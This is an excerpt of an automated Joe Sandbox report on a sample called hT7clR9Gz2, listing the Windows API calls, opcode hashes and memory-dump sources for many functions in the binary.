                                                                      • Instruction Fuzzy Hash: B7F0FC322031C5AADBA12A2B9C09F6F37589F8D770F284165F81C5A191DF7CCD0091A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 007D10AB
                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 007D10B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$AffinityCurrentMask
                                                                      • String ID:
                                                                      • API String ID: 1231390398-0
                                                                      • Opcode ID: ebb4ef5f9ae1479eae1b4faa8af6d1f35e2386b40831d57f9d6303bcac7a74e4
                                                                      • Instruction ID: ee99985f98afd7dd4c0342b4cb5976d35d4090bcf581f3e8089ea620eb8126e0
                                                                      • Opcode Fuzzy Hash: ebb4ef5f9ae1479eae1b4faa8af6d1f35e2386b40831d57f9d6303bcac7a74e4
                                                                      • Instruction Fuzzy Hash: 81E0D872B00145B7CF0997B49C059FB77FEEB442443148177E403D7201F938DE418660
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007EBF30: GetEnvironmentStringsW.KERNEL32 ref: 007EBF39
                                                                        • Part of subcall function 007EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007EBF5C
                                                                        • Part of subcall function 007EBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007EBF82
                                                                        • Part of subcall function 007EBF30: _free.LIBCMT ref: 007EBF95
                                                                        • Part of subcall function 007EBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007EBFA4
                                                                      • _free.LIBCMT ref: 007E82AE
                                                                      • _free.LIBCMT ref: 007E82B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                      • String ID:
                                                                      • API String ID: 400815659-0
                                                                      • Opcode ID: 2ed74ddb08090e9e970609cc5c816599e82376d18f7df129a2b147def1bce583
                                                                      • Instruction ID: 2829d9e12b4610518202fd707be4f5816d0c287bd5b06123b1c9196fc7e39dce
                                                                      • Opcode Fuzzy Hash: 2ed74ddb08090e9e970609cc5c816599e82376d18f7df129a2b147def1bce583
                                                                      • Instruction Fuzzy Hash: 77E06523A079D2D5D6E1727B7C4A66B0608AB8D338B550216F718DA1C3DE5C884645A7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA501
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007CA325,?,?,?,007CA175,?,00000001,00000000,?,?), ref: 007CA532
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2673547680-0
                                                                      • Opcode ID: 9c062468d4a71c1674d550c9c2d306b75f568b39a3390070a3526928a9703c48
                                                                      • Instruction ID: d73bab24fdadc399c6ecdeb3d23fcad99d67ac7b5447f47bf8210b0e5ab221dd
                                                                      • Opcode Fuzzy Hash: 9c062468d4a71c1674d550c9c2d306b75f568b39a3390070a3526928a9703c48
                                                                      • Instruction Fuzzy Hash: 72F03035240109BBDF015F60EC45FEA376DAF04385F44805AB949D5160DB75DA94DA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(000000FF,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641,000000FF), ref: 007CA1F1
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,007C977F,?,?,007C95CF,?,?,?,?,?,007F2641), ref: 007CA21F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2643169976-0
                                                                      • Opcode ID: 7958073bc3da0e0b6ef7bec8821df077b16efc698573515f62f3ef16af067193
                                                                      • Instruction ID: 6449330a0af034489a390b02aa81523b755008c6853bc61be6cfb75646fee86f
                                                                      • Opcode Fuzzy Hash: 7958073bc3da0e0b6ef7bec8821df077b16efc698573515f62f3ef16af067193
                                                                      • Instruction Fuzzy Hash: 8CE0927114021DBBDB015F60DC45FEA376CBF08386F48402AB944D6050EB69DE84DA64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,007F2641,000000FF), ref: 007DACB0
                                                                      • OleUninitialize.OLE32(?,?,?,?,007F2641,000000FF), ref: 007DACB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GdiplusShutdownUninitialize
                                                                      • String ID:
                                                                      • API String ID: 3856339756-0
                                                                      • Opcode ID: a81204e980ef4bf799c56cd27a4fb763bacc9b7eda750cc6e34eddca7c602563
                                                                      • Instruction ID: b6fbafa56dc7338677bd270870335501cc0164171bd5b33bc9fc13494a6eb0f6
                                                                      • Opcode Fuzzy Hash: a81204e980ef4bf799c56cd27a4fb763bacc9b7eda750cc6e34eddca7c602563
                                                                      • Instruction Fuzzy Hash: A5E06572504650EFC7119B58DC06B55FBA8FB48B20F004266F416D3760CB786841CA94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,007CA23A,?,007C755C,?,?,?,?), ref: 007CA254
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007CA23A,?,007C755C,?,?,?,?), ref: 007CA280
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2673547680-0
                                                                      • Opcode ID: cfd783c3b7e215e440122805e62bc3fc65dbbbafc70315047f92ec6a9de2ee56
                                                                      • Instruction ID: aba5c03403970499d5413226de8340d1215871170600c46dc0b4decf5a20d75e
                                                                      • Opcode Fuzzy Hash: cfd783c3b7e215e440122805e62bc3fc65dbbbafc70315047f92ec6a9de2ee56
                                                                      • Instruction Fuzzy Hash: E8E09272500128ABCB51AB64DC09FE97768EB083E6F044266FD44E3294DB78DE44CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007DDEEC
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(00000065,?), ref: 007DDF03
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                      • String ID:
                                                                      • API String ID: 2718869927-0
                                                                      • Opcode ID: 9e54821803f2b0ecafac0e80efd3d2f8400d3ef62ee7a21849aeec196faeb1ac
                                                                      • Instruction ID: d0f5f4f1f707f60544936b56c2a749c3f9435727559ff27992c11f6eec4bfda3
                                                                      • Opcode Fuzzy Hash: 9e54821803f2b0ecafac0e80efd3d2f8400d3ef62ee7a21849aeec196faeb1ac
                                                                      • Instruction Fuzzy Hash: E7E09B71410348E6DF02A760DC0AF9E376C6B05785F040455B245DA1A3D97CD6508675
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                      • String ID:
                                                                      • API String ID: 1175261203-0
                                                                      • Opcode ID: 8eac91377841591358bf9c271295d7cd7c111c340b0b3c8d6a428b1dd702a78f
                                                                      • Instruction ID: dd2066cfe3817034ceca59b6e14036a9b67ac652a59e4a4a1b13deb4c028f68c
                                                                      • Opcode Fuzzy Hash: 8eac91377841591358bf9c271295d7cd7c111c340b0b3c8d6a428b1dd702a78f
                                                                      • Instruction Fuzzy Hash: 37E04876500118ABDF11A794DC09FEB77ACEF093D1F0440667649D2104DA78DA84CBF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007DA3DA
                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007DA3E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: BitmapCreateFromGdipStream
                                                                      • String ID:
                                                                      • API String ID: 1918208029-0
                                                                      • Opcode ID: e9bc8ad71996bd8aea61ce54ca0f5ba74f64e4e4a06b8400ab88766b5967b6a8
                                                                      • Instruction ID: f0ec76f47edc8ad94d0482b5776569bf521d1652f2871e3af538ca2c42d4797c
                                                                      • Opcode Fuzzy Hash: e9bc8ad71996bd8aea61ce54ca0f5ba74f64e4e4a06b8400ab88766b5967b6a8
                                                                      • Instruction Fuzzy Hash: D2E0EDB1504218EBCB10EF55C545B9DBBF8EB14360F10805BA88697341E378BF04DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007E2BAA
                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007E2BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                      • String ID:
                                                                      • API String ID: 1660781231-0
                                                                      • Opcode ID: 6bc99a997232f6178d6caff00903e74e36cc538691f2c3cf76cf9ef2cec48ba3
                                                                      • Instruction ID: 9c1ebaf1c7f8bfcdbee0e36d09166b5ed2c00e3b11f118921429e40a6dc0c43b
                                                                      • Opcode Fuzzy Hash: 6bc99a997232f6178d6caff00903e74e36cc538691f2c3cf76cf9ef2cec48ba3
                                                                      • Instruction Fuzzy Hash: 59D0A7F41562C0648C546A73280E464234EAD497747A04696E4208A4D3FE5D90829025
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemShowWindow
                                                                      • String ID:
                                                                      • API String ID: 3351165006-0
                                                                      • Opcode ID: 90867909690a77a5ad399da3883c3ab4c6015bb5e1c6b3a5182c4c704067e74d
                                                                      • Instruction ID: d452d340ab3418e4dfc1305d401ca5e9443f1f70943231c669d002c0dedcaac4
                                                                      • Opcode Fuzzy Hash: 90867909690a77a5ad399da3883c3ab4c6015bb5e1c6b3a5182c4c704067e74d
                                                                      • Instruction Fuzzy Hash: EAC0123205C200BECB020BB4DC29C2BBBA8BBA5312F04C908B0A5C0060C23CC220DF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: cf495c199562fe8c83ed487d9edac92abbf5e290bf9ef007ec89c71283d89b00
                                                                      • Instruction ID: b9a6d4fdce6c0e4f713c0a3330cf31e03d6880b02fa169c1f18643b8e4e26bee
                                                                      • Opcode Fuzzy Hash: cf495c199562fe8c83ed487d9edac92abbf5e290bf9ef007ec89c71283d89b00
                                                                      • Instruction Fuzzy Hash: 9BC19F70A002549BEF25CF68C498FB97BA5AF06310F4841BDEC469B397DB389D54CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 62fc5e81da9a2f8c1b1c12424fafce96314e898a21ffb044a094a065d0c38379
                                                                      • Instruction ID: 6f1512dcb8a13c5e946f633e9eaf682ffae3576b94e674480de3882fa18e57d7
                                                                      • Opcode Fuzzy Hash: 62fc5e81da9a2f8c1b1c12424fafce96314e898a21ffb044a094a065d0c38379
                                                                      • Instruction Fuzzy Hash: DA71C471500F44DEDB35DB74C855EEBB7E5AF15301F40492EE2AB87242DA3A6A84CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C8289
                                                                        • Part of subcall function 007C13DC: __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$CloseFind
                                                                      • String ID:
                                                                      • API String ID: 2506663941-0
                                                                      • Opcode ID: 7679c647c1784cf7c4f252f041abb0c59cbde0f9376a459285a0c4a01698521f
                                                                      • Instruction ID: bd17b97a152ed50860fffcabb8799fcca465e44385d1e56be1e041c296b1e703
                                                                      • Opcode Fuzzy Hash: 7679c647c1784cf7c4f252f041abb0c59cbde0f9376a459285a0c4a01698521f
                                                                      • Instruction Fuzzy Hash: F34174719446589ADB24EB60CC59FEDB778AF00304F4404EFE18A97183EB795F85CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007C5E37: __EH_prolog.LIBCMT ref: 007C5E3C
                                                                        • Part of subcall function 007CCE40: __EH_prolog.LIBCMT ref: 007CCE45
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 56a21d364cb228685e1836ed06763daeb7d57aa33184fc58cf1011d0d0352be2
                                                                      • Instruction ID: 2de446d649a6d56a8cefdfdf6eef747cb041a4a19b4422c8a83c24f05b972f1c
                                                                      • Opcode Fuzzy Hash: 56a21d364cb228685e1836ed06763daeb7d57aa33184fc58cf1011d0d0352be2
                                                                      • Instruction Fuzzy Hash: 814136B0905B40DEE724DF798889AE6FBE5BF19300F50493EE5EE87282CB356654CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007C5E37: __EH_prolog.LIBCMT ref: 007C5E3C
                                                                        • Part of subcall function 007CCE40: __EH_prolog.LIBCMT ref: 007CCE45
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
